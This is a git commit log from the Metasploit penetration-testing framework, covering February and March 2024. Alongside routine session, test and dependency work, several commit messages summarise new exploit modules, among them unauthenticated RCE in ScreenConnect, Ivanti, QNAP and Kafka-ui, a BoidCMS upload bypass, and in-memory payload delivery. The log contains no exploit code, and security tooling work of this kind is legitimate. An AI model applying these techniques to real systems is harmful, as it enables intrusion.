cgranleese-r7 d964edde11 Land #18932, Add postgres acceptance tests 2024-03-12 10:36:46 +00:00
Adrian Șendroiu 2007e6d8fb Fix inconsistent casing in windows/local/wmi_persistence 2024-03-12 12:17:46 +02:00
Spencer McIntyre 65cc577694 Fix saving and loading DNS rules from the config 2024-03-11 14:55:36 -04:00
sfewer-r7 1e371d0e4a resolve teh Java payload issue on Linux by leveraging PayloadServlet, runnign teh payload in a thread, and forcing teh default optiosn for Spawn to be 0 2024-03-11 18:06:44 +00:00
SickMcNugget 67fcd57a1f Merge branch 'runc_priv_esc' of github.com:SickMcNugget/metasploit-framework into runc_priv_esc 2024-03-11 22:23:55 +08:00
SickMcNugget 6c1b4c1421 Update check to account for backports 2024-03-11 22:19:18 +08:00
Metasploit 172a200525 automatic module_metadata_base.json update 2024-03-11 09:10:38 -05:00
Zach Goldman 7ce91df66e clean up code duplication 2024-03-11 09:09:46 -05:00
Christophe De La Fuente 0252429715 Land #18775, Adding new module for MinIO (CVE-2023-28432) 2024-03-11 14:46:59 +01:00
adfoster-r7 49a5f0d113 Land #18937, fix docs typo 2024-03-11 10:27:57 +00:00
sfewer-r7 0513654f10 Fix edge case for java payloads when Spawn is set to 0, all access to the plugin will block. We can still get a session if we fall through here. We cant delete the plugin as access will block because we did not spawn. 2024-03-08 17:09:14 +00:00
sfewer-r7 ab0327fb33 clarify we are using SpEL not OGNL here 2024-03-08 15:57:46 +00:00
cudalac 980c5053f4 Peer Review 2024-03-08 08:54:38 -05:00
h00die-gr3y 7f02daf37d use send_request_cgi for payload delivery 2024-03-08 10:53:45 +00:00
dotslashsuperstar 7539c3b958 Added arguments to db_import 2024-03-08 00:28:15 -08:00
Josh 4078707933 fix typo 2024-03-07 23:28:29 +01:00
h00die b41e38bca3 mongodb ops manager diagnostic archive info disclosure 2024-03-07 17:05:25 -05:00
h00die-gr3y 66e7f3c582 third release module 2024-03-07 21:22:14 +00:00
Spencer McIntyre fc2d5c2659 Fix ldap auto authentication
When the auth method is set to auto and a domain is specific, use NTLM.
2024-03-07 14:04:08 -05:00
Spencer McIntyre 7bce40308a Update module data to improve discoverability 2024-03-07 13:28:22 -05:00
Metasploit 1d764c1780 automatic module_metadata_base.json update 2024-03-07 08:05:54 -06:00
Christophe De La Fuente ba75b3bb3f Land #18716, gitlab password reset account takeover (CVE-2023-7028) 2024-03-07 14:40:29 +01:00
cgranleese-r7 169ea31673 Land #18930, Adds a help command within the interactive query prompt 2024-03-07 12:07:15 +00:00
adfoster-r7 0139ed61d1 Land #18931, adds notification when initially entering a SQL shell within SQL session types 2024-03-07 11:50:05 +00:00
cgranleese-r7 0fad7bbe1c Adds a notification when initially interatcing with SQL shell via command 2024-03-07 11:34:45 +00:00
Dean Welch 2a68e04292 Update help message 2024-03-07 11:03:07 +00:00
adfoster-r7 e7bc17cab3 Add postgres acceptance tests 2024-03-07 10:35:45 +00:00
Metasploit b91b718077 Bump version of framework to 6.3.60 2024-03-07 03:34:49 -06:00
adfoster-r7 a3a331a07a Land #18926, updates new sessions to have a consistent local file system API 2024-03-06 17:03:58 +00:00
Metasploit 05a7698773 automatic module_metadata_base.json update 2024-03-06 11:00:31 -06:00
Christophe De La Fuente e20558ec35 Land #18821, Gitlab public email disclosure CVE-2023-5612 2024-03-06 17:39:24 +01:00
Christophe De La Fuente f872535c68 Small missing updates before it land 2024-03-06 17:37:33 +01:00
Dean Welch 60431057ad Adds a help command within the interactive query prompt 2024-03-06 16:32:16 +00:00
Metasploit 8f759af4de automatic module_metadata_base.json update 2024-03-06 10:09:24 -06:00
cgranleese-r7 64831b67f1 Update new session to have a consistent local fs API 2024-03-06 15:52:09 +00:00
Spencer McIntyre 23e0abe2f6 Land #18686, ssh_version module 2024-03-06 10:32:01 -05:00
cgranleese-r7 b114058389 Land #18928, Don't close smb client when it comes from the session 2024-03-06 15:29:02 +00:00
cgranleese-r7 c411802163 Land #18929, Update yard dependencies 2024-03-06 15:17:28 +00:00
adfoster-r7 c3eca46de4 Update yard dependencies 2024-03-06 14:56:11 +00:00
Dean Welch 936b311a1b Don't close smb client when it comes from the session 2024-03-06 14:20:34 +00:00
cgranleese-r7 9af1f6970a Land #18920, Fix smb session autorun 2024-03-06 12:20:44 +00:00
adfoster-r7 76e27ed208 Land #18924, allow selecting auxiliary modules in RPC 2024-03-06 11:49:05 +00:00
h00die 8b6f7594e4 ssh_version module 2024-03-05 17:18:24 -05:00
h00die c4837d09e9 ssh_version module 2024-03-05 17:15:43 -05:00
Metasploit 7b595d2354 automatic module_metadata_base.json update 2024-03-05 15:33:49 -06:00
Spencer McIntyre 9b8b7045ff Land #18715, Add Splunk library 2024-03-05 16:17:30 -05:00
Spencer McIntyre 57bc748e9c Land #18921, Add ip to smb session prompt 2024-03-05 15:17:26 -05:00
Gaurav Jain 985b0ba47f Add reviewed changes to splunk library 2024-03-06 01:32:57 +05:30
Spencer McIntyre b30f264630 Land #18844, fix #file_dropper_exist? for Window
Bugfix Msf::Exploit::FileDropper#file_dropper_exist? for Windows sessions
2024-03-05 15:01:20 -05:00
h00die-gr3y 7dbd25bcbf added documentation 2024-03-05 18:42:09 +00:00
Metasploit e7a520738d automatic module_metadata_base.json update 2024-03-05 12:38:24 -06:00
adfoster-r7 4eb4c3b025 Land #18923, Use HTTPS link for postgres_sql reference 2024-03-05 18:19:28 +00:00
sjanusz-r7 41d458f038 Allow selecting auxiliary modules in RPC 2024-03-05 17:55:05 +00:00
sjanusz-r7 1667da7b07 Use HTTPS link for postgres_sql reference 2024-03-05 17:49:13 +00:00
Dean Welch b473b6de77 Add ip to smb session prompt 2024-03-05 15:23:21 +00:00
Dean Welch 2399c2a393 Fix smb session autorun 2024-03-05 15:07:53 +00:00
sfewer-r7 5c56d6a4fc typo 2024-03-05 14:47:04 +00:00
sfewer-r7 b925f798e5 typo and clarify description 2024-03-05 14:39:17 +00:00
sfewer-r7 aac4ef09cc add in disclosure date and blogs 2024-03-05 11:09:22 +00:00
RadioLogic cbbb6cbda4 Merge branch 'master' into docker-kernel-module-escape 2024-03-04 22:58:18 -05:00
jheysel-r7 1124e347df Fix rubocop error 2024-03-04 18:39:58 -05:00
jheysel-r7 bf59f58661 Update modules/auxiliary/gather/gitlab_tags_rss_feed_email_disclosure.rb 2024-03-04 18:34:35 -05:00
h00die a524682f63 x11 screenshot module progress 2024-03-04 17:40:01 -05:00
Metasploit 95283f7d3e automatic module_metadata_base.json update 2024-03-04 13:57:33 -06:00
Christophe De La Fuente 1e8e6d3bc4 Land #18796, Enhance ManageEngine Endpoint Central and ServiceDesk Plus CVE-2022-47966 2024-03-04 20:35:22 +01:00
Christophe De La Fuente 39af0bf535 Set Java target default paylaod to java/meterpreter/reverse_tcp 2024-03-04 20:33:27 +01:00
h00die-gr3y 6bc74364e1 second release module 2024-03-04 18:57:54 +00:00
cgranleese-r7 9b2b042e19 Land #18875, Add conditional option validation depending on SESSION/RHOST connection 2024-03-04 17:36:52 +00:00
Dean Welch 2df926ae1d Yard doc required options 2024-03-04 17:13:16 +00:00
Metasploit 2eaec5b9a8 automatic module_metadata_base.json update 2024-03-04 09:14:08 -06:00
cgranleese-r7 4fc9e269ae Land #18862, Align SQL sessions peerhost and peerport 2024-03-04 14:57:26 +00:00
sfewer-r7 d748adcf80 check the expected response from a patched server 2024-03-04 14:32:39 +00:00
sjanusz-r7 3c8f43e23e Align SQL sessions peerhost and peerport 2024-03-04 13:11:32 +00:00
Metasploit e912509715 automatic module_metadata_base.json update 2024-03-04 06:41:30 -06:00
dwelch-r7 28a38f3aa0 Land #18908, Update SAMR computer and ICPR cert to support SMB sessions 2024-03-04 12:20:53 +00:00
cgranleese-r7 97ef5cf827 Land #18903, Update sql prompt on db change 2024-03-04 11:23:44 +00:00
adfoster-r7 06593b02b2 Land #18911, Resolve deprecation warnings from actions/checkout in Github actions 2024-03-04 10:54:24 +00:00
h00die 7f6be50855 review of ssh_version improvements 2024-03-03 17:59:00 -05:00
h00die-gr3y 5d20321153 first release module 2024-03-03 19:38:02 +00:00
h00die f2d836d008 review of ssh_version improvements 2024-03-03 09:18:52 -05:00
dotslashsuperstar e1b232b58b Add extra cves and urls to vuln references when importing OpenVAS. 2024-03-03 05:55:45 -08:00
KanchiMoe ac7c06e18c Upversion Github Actions 2024-03-02 14:30:54 +00:00
h00die 69b89c5d95 WIP x11 screenshots and lib 2024-03-01 15:15:39 -05:00
h00die bd956e7aef WIP x11 screenshots and lib 2024-03-01 15:14:43 -05:00
adfoster-r7 8e5f26fac0 Land #18905, update the SMB session pwd command output to be in line with SMB client output 2024-03-01 20:07:59 +00:00
adfoster-r7 76166c0d14 Update SAMR computer and ICPR cert to support SMB sessions 2024-03-01 17:53:58 +00:00
sfewer-r7 a5fb83d0e1 add in 2023.11.2 as tested on 2024-03-01 17:03:38 +00:00
sfewer-r7 9988117cca rename with cve number 2024-03-01 16:42:59 +00:00
sfewer-r7 fa4a16df5e add in cve number 2024-03-01 16:39:38 +00:00
Balgogan 1f05f9a0f1 Add recommendation 2024-03-01 14:36:13 +01:00
sjanusz-r7 8184035d57 Show query help on empty query call 2024-03-01 11:33:13 +00:00
sjanusz-r7 82486e712c Early return on nil query result 2024-03-01 11:28:28 +00:00
sjanusz-r7 6b11cd4332 Fix tests broken by updating SQL prompt on DB change 2024-03-01 11:27:52 +00:00
sjanusz-r7 1b73044203 Correctly handle changing of databases and the query return values for SQL sessions 2024-03-01 11:27:52 +00:00
Metasploit 401cdca09b automatic module_metadata_base.json update 2024-02-29 23:48:56 -06:00
Jack Heysel a73a7531a9 Land #18827, Add module for BoidCMS CVE-2023-38836
This is an authenticated RCE against BoidCMS versions 2.0.0 and earlier.
The underlying issue is that the file upload check allows a php file to
be uploaded and executes as a media file if the GIF header is present in
the PHP file.
2024-02-29 21:31:44 -08:00
Metasploit ee681cdb79 automatic module_metadata_base.json update 2024-02-29 17:20:20 -06:00
adfoster-r7 d4791f966b Land #18904, change bloodhound OutputDirectory to OptString 2024-02-29 23:03:13 +00:00
adfoster-r7 d10909c961 Land #18887, Adds support for searching by session types 2024-02-29 22:38:20 +00:00
adfoster-r7 4d85a8dff9 Land #18902, Update github action libraries 2024-02-29 22:29:16 +00:00
adfoster-r7 703e9ba68d Land #18896, Resolve deprecation warnings from setup-python in Github actions 2024-02-29 22:28:53 +00:00
Spencer McIntyre bcb4e3aa9d Update the help output in the docs page too 2024-02-29 16:56:06 -05:00
Spencer McIntyre d09053cde5 Add the viewstate generator as an option 2024-02-29 16:56:06 -05:00
Spencer McIntyre 3e80e04b34 Adjust option validation 2024-02-29 16:56:06 -05:00
Spencer McIntyre f1a9d9988a Update the dot_net.rb tool help output 2024-02-29 16:56:06 -05:00
Spencer McIntyre 0975f99305 Add viewstate options 2024-02-29 16:55:59 -05:00
Spencer McIntyre 87f91f284a Add unit tests for the new rex viewstate library 2024-02-29 16:55:54 -05:00
Spencer McIntyre 88ea9af859 Add ESC2 and ESC3 templates too 2024-02-29 16:15:39 -05:00
Spencer McIntyre b2c5a4f335 Print some additional attributes for debugging 2024-02-29 16:15:39 -05:00
Spencer McIntyre dfb271d883 Don't crash when attributes are missing 2024-02-29 15:07:34 -05:00
bwatters 550c6f030a Updates based on jheysel-r7's suggestions 2024-02-29 12:42:22 -06:00
adfoster-r7 fcbb3bddfa Update github action libraries 2024-02-29 15:51:23 +00:00
cgranleese-r7 0c1bcbf275 Adds support for searching by session types 2024-02-29 15:15:40 +00:00
cgranleese-r7 fcba49d23a Update pwd output to be inline with smb client output 2024-02-29 15:11:40 +00:00
Patrick Double 8b1ff6d44e change bloodhound OutputDirectory to OptString
OptPath is intended for a local path and performs validation. Attempting to set it to a target path that doesn't exist on the local fails.
2024-02-29 07:12:37 -06:00
sjanusz-r7 6fe9ef5f8c Align SQL clients to use current_database 2024-02-29 12:34:54 +00:00
cgranleese-r7 17315653a5 Land #18901, Fix Rex MySQL wrapper test to have correct method symbol 2024-02-29 11:48:16 +00:00
sjanusz-r7 bc4362d07d Fix Rex MySQL wrapper test to have correct method symbol 2024-02-29 11:16:18 +00:00
Metasploit a0dc757cb8 automatic module_metadata_base.json update 2024-02-29 05:06:39 -06:00
adfoster-r7 b0123eab2e Land #18890, rename shell to query_interactive for sql session types, add -i flag 2024-02-29 10:41:06 +00:00
adfoster-r7 d8abd2bcc2 Land #18898, Add rex proto mysql client wrapper 2024-02-29 10:13:47 +00:00
dwelch-r7 a4543b0f41 Land #18897, Update smb login to support additional configuration 2024-02-29 10:07:02 +00:00
Metasploit 435759bb47 Bump version of framework to 6.3.59 2024-02-29 03:39:23 -06:00
sfewer-r7 f0ca5c10dc we can shuffle thequery params so teh jsp param is not first. we can optionally add soem charachters before the trailing .jsp 2024-02-29 09:13:44 +00:00
Jack Heysel 4fe861c653 Land #18878, Update rspec gems
This PR updates a number of rspec gems which help improve test suite
error messages when string encodings are different.
2024-02-28 20:37:11 -08:00
adfoster-r7 131585235b Update SMB Login to support additional configuration 2024-02-28 20:24:06 +00:00
Balgogan 45ae984dc1 Add additional verification step 2024-02-28 20:30:58 +01:00
Balgogan b3d45f7d9b Fix oversight and further optimize code execution 2024-02-28 20:16:14 +01:00
Jack Heysel 8ce95003fe Rubocop 2024-02-28 11:09:34 -08:00
Jack Heysel 6589b86a4c Updated check method to account for backports 2024-02-28 11:04:38 -08:00
Balgogan 9f87510b50 Optimize code structure and enhance vulnerability check 2024-02-28 20:02:31 +01:00
sjanusz-r7 b423241e6b Use Rex Post MySQL Client for lib, specs & modules 2024-02-28 18:19:50 +00:00
sjanusz-r7 55a8d6732f Add Rex Proto MySQL Client 2024-02-28 18:19:46 +00:00
Metasploit 42255a27a6 automatic module_metadata_base.json update 2024-02-28 10:13:56 -06:00
adfoster-r7 26214cbfd2 Land #18889, Fresh SQL prompt when pressing enter if no input was provided 2024-02-28 15:40:43 +00:00
Jack Heysel 4b54d43db5 Land #18892, Add AD CS Updates for ESC13
This PR adds functionality to enable Metasploit users
to be able to exploit the latest ESC technique, ESC13.
2024-02-28 07:28:16 -08:00
Spencer McIntyre 1726767fdf Update the workflow docs for ESC13 2024-02-28 08:48:30 -05:00
Spencer McIntyre 8bc6705557 Move viewstate signing logic into Rex 2024-02-27 14:37:55 -05:00
KanchiMoe a887682e0f Upversion setup-python to v5 2024-02-27 19:20:22 +00:00
h00die 75d007b44c WIP x11 screenshots and lib 2024-02-27 12:52:22 -05:00
Zach Goldman 17d8fa2335 rename shell to query_interactive for sql session types, add -i flag 2024-02-27 11:38:04 -06:00
adfoster-r7 334f9e5ff9 Land #18893, updates the help command to consistently format columns 2024-02-27 17:04:00 +00:00
sjanusz-r7 efba30031d Fix early returns in Reline prompt 2024-02-27 16:59:38 +00:00
sfewer-r7 b7200b52e1 typo 2024-02-27 14:58:56 +00:00
sjanusz-r7 d51aa30fff Rex Table command column width based on longest dispatcher command with sane default 2024-02-27 13:11:24 +00:00
sfewer-r7 f52543b4a6 Older version of TeamCity (circa 2018) do not support access tokens, so we can fall back on creating an admin user accoutn before we upload the plugin. Creating an access token is better as we can delete the token, unlike the user account. 2024-02-27 12:01:57 +00:00
sfewer-r7 8bca294966 use the Faker library 2024-02-27 12:00:38 +00:00
Spencer McIntyre 75c6dcdc15 Detect templates that are vulnerable to ESC13 2024-02-26 17:28:42 -05:00
Spencer McIntyre 3cbf46c5b7 Reuse the ldap connection once established 2024-02-26 17:28:42 -05:00
Spencer McIntyre 4a51e028d8 Print multiple attributes on individual rows 2024-02-26 17:28:41 -05:00
Spencer McIntyre 97f75c19e4 Show the objectSID of groups as well 2024-02-26 17:28:41 -05:00
Spencer McIntyre fefc3cb73c Show names for issuance policy OIDs 2024-02-26 17:28:31 -05:00
Balgogan f04b66d6dd Add wp_bricks_builder_rce 2024-02-26 22:09:38 +01:00
h00die 453f8bbeff more x11 progress, now working on screenshots, WIP 2024-02-26 15:16:47 -05:00
sjanusz-r7 488d4c0387 Fresh SQL prompt when pressing enter if no input was provided 2024-02-26 16:49:15 +00:00
Simon Janusz b91430c878 Land #18886, Removes the 'run' command from SMB and SQL session types 2024-02-26 14:38:36 +00:00
cgranleese-r7 76a1518eab Removes the run command from SMB and SQL session type and improves smb session pwd commands error message 2024-02-26 10:55:11 +00:00
adfoster-r7 787a2cb19e Land #18872, add support for boolean datatypes on mssql 2024-02-26 10:51:58 +00:00
Gaurav Jain 1eea790759 Update spec tests for Msf::Ui::Console::CommandDispatcher::Session.rb
- Fixes spec test for sessions command where session id should be
  sent as a string and not as an integer
2024-02-25 17:35:53 +05:30
Gaurav Jain 597807316e Add -i option to Session mixin's sessions command 2024-02-25 15:32:46 +05:30
Metasploit 3759346f10 automatic module_metadata_base.json update 2024-02-23 13:43:57 -06:00
Jack Heysel f2de6d6357 Land #18870, Add ConnectWise ScreenConnect module.
This PR add an unauthenticatd RCE exploit for ConnectWise
ScreenConnect (CVE-2024-1709).
2024-02-23 11:25:33 -08:00
Jack Heysel 03e5b36008 Land #18833, fix for issue #18561
This PR catches an exception when updating a non-existing session.
Prior to this PR trying to run sessions -k after running workspace -D
would result in a stacktrace being printed to the console.
2024-02-23 11:18:03 -08:00
h00die 5e42df8cd4 more x11 progress 2024-02-23 13:53:07 -05:00
Dean Welch 39f518eebb Conditionally validate only when session type is enabled 2024-02-23 18:08:09 +00:00
sfewer-r7 d7a0dee7d1 @rad10 noted the download link we gave no longer works, but has provided a second link, so adding that to the docs 2024-02-23 17:54:14 +00:00
sfewer-r7 ebe6e54259 use the Faker module to gen the plugins metadata. 2024-02-23 17:48:01 +00:00
sfewer-r7 fe8867356e we can use Faker::Internet.uuid here instead of rolling our own uuid maker 2024-02-23 17:47:28 +00:00
sfewer-r7 f3af1836ce allow a custom USERNAME and PASSWORD to be specified if needed. Will default to a random value. Also use Faker::Internet.email to gen an email address 2024-02-23 17:46:49 +00:00
Dean Welch 355d5c2426 Enable new session types for tests 2024-02-23 17:45:19 +00:00
Dean Welch 559ab0f10d Add tests for optional session mixins 2024-02-23 17:12:25 +00:00
adfoster-r7 7c000bc101 Land #18880, Fix typo in SASL supported mechanisms 2024-02-23 17:12:00 +00:00
Jeffrey Martin dee2f2aa0d Fix typo in SASL supported mechanisms 2024-02-23 10:29:47 -06:00
adfoster-r7 9ae9e06017 Land #18879, update kerberos/inspect_ticket to include PAC credential information 2024-02-23 16:20:57 +00:00
Spencer McIntyre 0ade721bf1 Propagate precise encryption key length errors 2024-02-23 10:28:05 -05:00
Spencer McIntyre 94587433cd Add a presenter for the PAC credential information 2024-02-23 09:48:09 -05:00
Spencer McIntyre ca562a95d8 Truncate private data at 88 chars
Truncating at 87 was the exact length to trim the last byte of an AES256
kerberos key. Furthermore, adding the (TRUNCATED) string to the end
caused the resuting value to be larger than the original trucated value.
2024-02-23 09:46:44 -05:00
sfewer-r7 47596c6a0c add in docs 2024-02-23 14:30:53 +00:00
sfewer-r7 30e761831e we can also register this path for cleanup 2024-02-23 14:00:27 +00:00
Dean Welch 244e20a3d5 Update expected error in tests 2024-02-23 12:47:48 +00:00
sfewer-r7 d5bcac1370 improve check routine to include target platform 2024-02-23 11:49:38 +00:00
Spencer McIntyre 257ec484c7 Show names for x509 OID constants 2024-02-22 17:36:30 -05:00
Spencer McIntyre 4b7f4e2b0d Just show the DN, commas and all
This way the DN can just be copy-pasted into locations where a DN is
expected.
2024-02-22 17:36:30 -05:00
h00die d85f2575a9 Thanks adfoster for spec fixes 2024-02-22 16:20:40 -05:00
adfoster-r7 8fca7d188f Update rspec libraries 2024-02-22 21:02:37 +00:00
h00die e7ca9485ed working xspy code 2024-02-22 15:34:20 -05:00
h00die 794e304cee working but ugly code 2024-02-22 15:31:16 -05:00
h00die 7292877b18 more progress, broke up lib x11 into different files/folders 2024-02-22 15:30:14 -05:00
sfewer-r7 003d5e7006 The check routine can now display the targets platform in addition to the version number (we can determine this with a single request, so there is no major change here). This is usefull so you know what platform to set the exploits target to (so you can select an appropriate payload). Thanks @iagox86 for the idea! 2024-02-22 19:23:48 +00:00
Zach Goldman d65827367f Land #18874 Fix undefined mssql_query method call on mssql client 2024-02-22 13:35:04 -05:00
errorxyz 97513d473f Update manageengine_endpoint_central and servicedesk_plus default payloads 2024-02-23 00:00:18 +05:30
Metasploit a183289945 automatic module_metadata_base.json update 2024-02-22 12:17:58 -06:00
Dean Welch 8bc50c1d3a Add conditional option validation depending on SESSION or RHOST connection 2024-02-22 17:57:20 +00:00
adfoster-r7 f3a637b4e9 Land #18873, fix the create session datastore option from appearing for payloads 2024-02-22 17:50:52 +00:00
Zach Goldman 854dcc5776 add support for boolean datatypes on mssql 2024-02-22 11:08:49 -06:00
sfewer-r7 27a1233de8 Turns out only x64 is supported on Windows, so remove ARCH_X86, as if we try to inject an x86 payload in-memory we crash the target x64 service. 2024-02-22 16:41:18 +00:00
sjanusz-r7 a07d1c88be Fix undefined mssql_query on mssql client 2024-02-22 16:41:10 +00:00
sfewer-r7 79bfbe4310 now that Linux is a target we have to move this to the multi directory 2024-02-22 16:34:43 +00:00
Spencer McIntyre 2c09f385d6 Land #18849, Improve visual indentation
Improve visual indentation logic for tables
2024-02-22 11:23:53 -05:00
cgranleese-r7 d52220cccb Fixes the create session datastore option from appearing for payloads 2024-02-22 14:58:41 +00:00
sfewer-r7 65cb30b0a4 update docs 2024-02-22 14:55:02 +00:00
sfewer-r7 0b14d1b495 add a Linux command payload target, tested on version 20.3.31734. We leverage the path traversal CVE-2023-1708 to ensure the dropped ASHX file can be reached. This was blocking the Linux target from working. Also works fine on Windows. We leverage FileDropper mixin to delete this file. 2024-02-22 14:54:45 +00:00
sfewer-r7 8b4fee010c remove the full stop to make it easier to copy andpast the password (and not accidentaly copy the full stop charachter) 2024-02-22 14:52:18 +00:00
adfoster-r7 d76dd4a7fb Improve visual indentation logic for tables 2024-02-22 14:43:29 +00:00
Gaurav Jain b2cb102c9b Merge branch 'rapid7:master' into manageengine 2024-02-22 17:20:28 +05:30
Gaurav Jain 51dcd5c971 Update splunk cve-2023-32707 to use reviewed changes 2024-02-22 17:13:44 +05:30
adfoster-r7 4af5c5438f Land #18830, SQL sessions consolidation 2024-02-22 11:42:11 +00:00
Metasploit c5eb4eb8a9 Bump version of framework to 6.3.58 2024-02-22 03:35:01 -06:00
Christophe De La Fuente a1a0df74eb Land #18866, Update Windows 11 Mimikatz support - update metasploit-payloads gem to 2.0.166 2024-02-22 09:50:35 +01:00
sfewer-r7 eded0e7788 POST the payload.encoded data when we trigger the ASHX file, this way we dont drop the Metasploit payload to disk. 2024-02-21 23:38:35 +00:00
sjanusz-r7 085071da02 Convert generic SQL mixin into a class 2024-02-21 18:01:55 +00:00
sfewer-r7 f6b1c9b1ce add in docs 2024-02-21 17:44:16 +00:00
sfewer-r7 e0ee7940d0 CISA has assigned this vulnerability CVE-2024-1709 2024-02-21 17:12:08 +00:00
sfewer-r7 2839683af5 use Rex::RandomIdentifier::Generator to generate identifiers. 2024-02-21 17:08:40 +00:00
Metasploit aefebd996a automatic module_metadata_base.json update 2024-02-21 11:07:58 -06:00
Jack Heysel 0aa20c73a4 Land #18832, Add exploit module CVE-2023-47218
The PR adds a module targeting CVE-2023-47218, an
unauthenticated command injection vuln affecting QNAP
QTS and QuTH Hero.
2024-02-21 08:48:30 -08:00
sjanusz-r7 1b7c2bbaec SQL sessions consolidation 2024-02-21 16:16:14 +00:00
sfewer-r7 10f11c94e1 improve the error description for failure messages 2024-02-21 16:11:50 +00:00
sfewer-r7 9828ffa870 add an in-memory payload target 2024-02-21 16:07:01 +00:00
sfewer-r7 2d8b0f414d remove redundant slashes in other calls to normalize_uri 2024-02-21 16:04:19 +00:00
sfewer-r7 61c1a513a5 drop the leading forward slash 2024-02-21 15:59:25 +00:00
dwelch-r7 cc565a1731 Land #18871, Fix crash when using webconsole 2024-02-21 14:05:16 +00:00
adfoster-r7 82c2eb9899 Fix crash when using webconsole 2024-02-21 13:53:17 +00:00
sfewer-r7 6d473b2424 remove debug prints 2024-02-21 13:30:06 +00:00
sfewer-r7 c529749f77 fix tabs 2024-02-21 13:14:35 +00:00
cgranleese-r7 7b618d4f41 Land #18817, Improve options display optional session types 2024-02-21 13:03:45 +00:00
Dean Welch bf1608a4ad Show session/rhost options separate from each other 2024-02-21 12:51:11 +00:00
Metasploit f70667124f automatic module_metadata_base.json update 2024-02-20 17:56:50 -06:00
bwatters d21e4080a9 Land #18792, Ivanti Connect Secure - Unauth RCE (CVE-2024-21893 + CVE-2024-21887) #18792
Merge branch 'land-18792' into upstream-master
2024-02-20 17:40:12 -06:00
h00die f4b698b080 more progress, broke up lib x11 into different files/folders 2024-02-20 16:11:36 -05:00
Spencer McIntyre b79790cff6 Update metasploit-payloads gem to 2.0.166
Includes changes from:
* rapid7/metasploit-payloads#698
2024-02-20 13:35:42 -05:00
adfoster-r7 06b3004af4 Land #18864, allias ls and dir commands inside new SMB session type prompt 2024-02-20 18:22:45 +00:00
cgranleese-r7 a30a7f81e5 Land #18865, Consolidate option dumps 2024-02-20 18:09:02 +00:00
Dean Welch e288592beb Add yard docs and small tidy up 2024-02-20 16:15:16 +00:00
Dean Welch 901a972a71 Remove extra CI test run 2024-02-20 14:48:04 +00:00
cgranleese-r7 4fcb4a4e3a Land #18863, Expose MSSQL initial connection info in client 2024-02-20 14:17:34 +00:00
cgranleese-r7 768ad16d8c Alias ls and dir inside new smb session type prompt 2024-02-20 14:15:30 +00:00
Dean Welch 175d584ff7 Consolidate option dump remove condition datastore condition on tests 2024-02-20 14:09:17 +00:00
sjanusz-r7 200d03c417 Expose MSSQL initial connection info in client 2024-02-20 11:36:10 +00:00
Metasploit a3d8b0f77a automatic module_metadata_base.json update 2024-02-19 10:41:33 -06:00
cgranleese-r7 e66f6c106b Land #18847, Add Proxies support to creating a session with postgres_login 2024-02-19 16:20:09 +00:00
cgranleese-r7 3be5988679 Land #18848, Add Proxies support to creating a session with mssql_login 2024-02-19 16:10:37 +00:00
Metasploit 2cc8281db7 automatic module_metadata_base.json update 2024-02-19 08:42:51 -06:00
cgranleese-r7 c2a217efcd Land #18854, Add Proxies support to creating a session with mysql_login 2024-02-19 14:27:22 +00:00
adfoster-r7 5735c7cb89 Land #18857, Documentation: Updated instructions for setting up msfdb 2024-02-19 13:38:03 +00:00
dwelch-r7 6db865a46c Land #18850, Fix failing ldap server tests 2024-02-19 12:39:52 +00:00
sjanusz-r7 b2f36e41c4 Add Proxies support to creating a session with mysql_login 2024-02-19 12:22:51 +00:00
sfewer-r7 edf2bae69a add native java payload support 2024-02-19 11:37:34 +00:00
Metasploit 66696d201b automatic module_metadata_base.json update 2024-02-19 05:33:15 -06:00
cgranleese-r7 db3b2de3f3 Land #18855, Use database_name for SQL sessions 2024-02-19 11:10:02 +00:00
dwelch-r7 0108f1f214 Land #18861, Removes SessionType values from modules with OptionalSession mixin 2024-02-19 10:57:41 +00:00
cgranleese-r7 de17261926 Removes session types from module with session type mixin 2024-02-19 10:34:16 +00:00
sfewer-r7 60bc412026 file_dropper_exist? needs to test if teh path if either a file or a directory, the logic for shell sessions on wqindows is testing if a path if a file and not a directory. this is wrong. Origionally FileDropper only supported cleaningup files, so this logic made sense (it was copied over from teh File post moduile) but FileDropper has since supported directories so teh logic here neds to reflect that. 2024-02-19 09:12:17 +00:00
sjanusz-r7 64ab62f2c3 Use database_name for SQL sessions 2024-02-17 03:31:58 +00:00
adfoster-r7 ca367bc87b Fix failing LDAP server tests 2024-02-16 23:43:07 +00:00
bwatters c298540bea Add documentation and fix default payloads 2024-02-16 16:49:49 -06:00
Metasploit 19c1a35592 automatic module_metadata_base.json update 2024-02-16 14:55:39 -06:00
Jack Heysel 8cddffa3d1 Land #18700, Add Kafka-ui Unauth RCE module
This PR adds an exploit module for CVE-2023-52251 which
is an unauthenticated rce vulnerability in Kafka's UI.
2024-02-16 15:38:52 -05:00
Metasploit eef29a5100 automatic module_metadata_base.json update 2024-02-16 14:31:32 -06:00
sjanusz-r7 bc6bf1c4f3 Add Proxies support to creating a session with mssql_login 2024-02-16 20:22:11 +00:00
Jack Heysel a1b0ff0fcf Land #18681, Update Apache Ofbiz w. Auth-Bypass
This PR updates the pre-existing apache_ofbiz_deserialization
module to include functionality that will bypass authentication by
using the newly discovered CVE-2023-51467.
2024-02-16 15:02:34 -05:00
sfewer-r7 a8408f139e add in ARCH_CMD payloads to get a native meterpreter session 2024-02-16 17:28:38 +00:00
sfewer-r7 32ed8eeedf rework some of the cleanup logic 2024-02-16 15:31:07 +00:00
sjanusz-r7 fc963bd8bb Add Proxies support to creating a session with postgres_login 2024-02-16 14:45:17 +00:00
adfoster-r7 94f0d243c7 Land #18846, msftidy_docs.rb add TARGETURI to universal option list 2024-02-16 14:23:33 +00:00
Christophe De La Fuente da9164fcc6 Add targeturi to universal option list 2024-02-16 12:58:49 +01:00
sfewer-r7 3483419d50 file_dropper_exist? was broken on the windows platform, so files registered for cleanup were not being deleted. We must call session.shell_command_token 2024-02-16 10:09:07 +00:00
sfewer-r7 04d501a7a7 make msftidy happy 2024-02-16 10:05:24 +00:00
sfewer-r7 cdba70b44d add in jetbrains teamcity rce 0day 2024-02-16 10:04:28 +00:00
jlownie 90ed3cd00a Merge pull request #1 from jlownie/jlownie-patch-1
Documentation: Updated instructions for setting up msfdb
2024-02-16 13:50:43 +11:00
jlownie 0e98da39c2 Updated instructions for setting up msfdb
Added some missing information
2024-02-16 13:43:40 +11:00
adfoster-r7 bbe1098b13 Land #18842, update docker image bundler args 2024-02-15 23:22:57 +00:00
Metasploit e15fd1a782 automatic module_metadata_base.json update 2024-02-15 16:35:11 -06:00
Jack Heysel 6c252de974 Docs plus minor edits 2024-02-15 17:12:11 -05:00
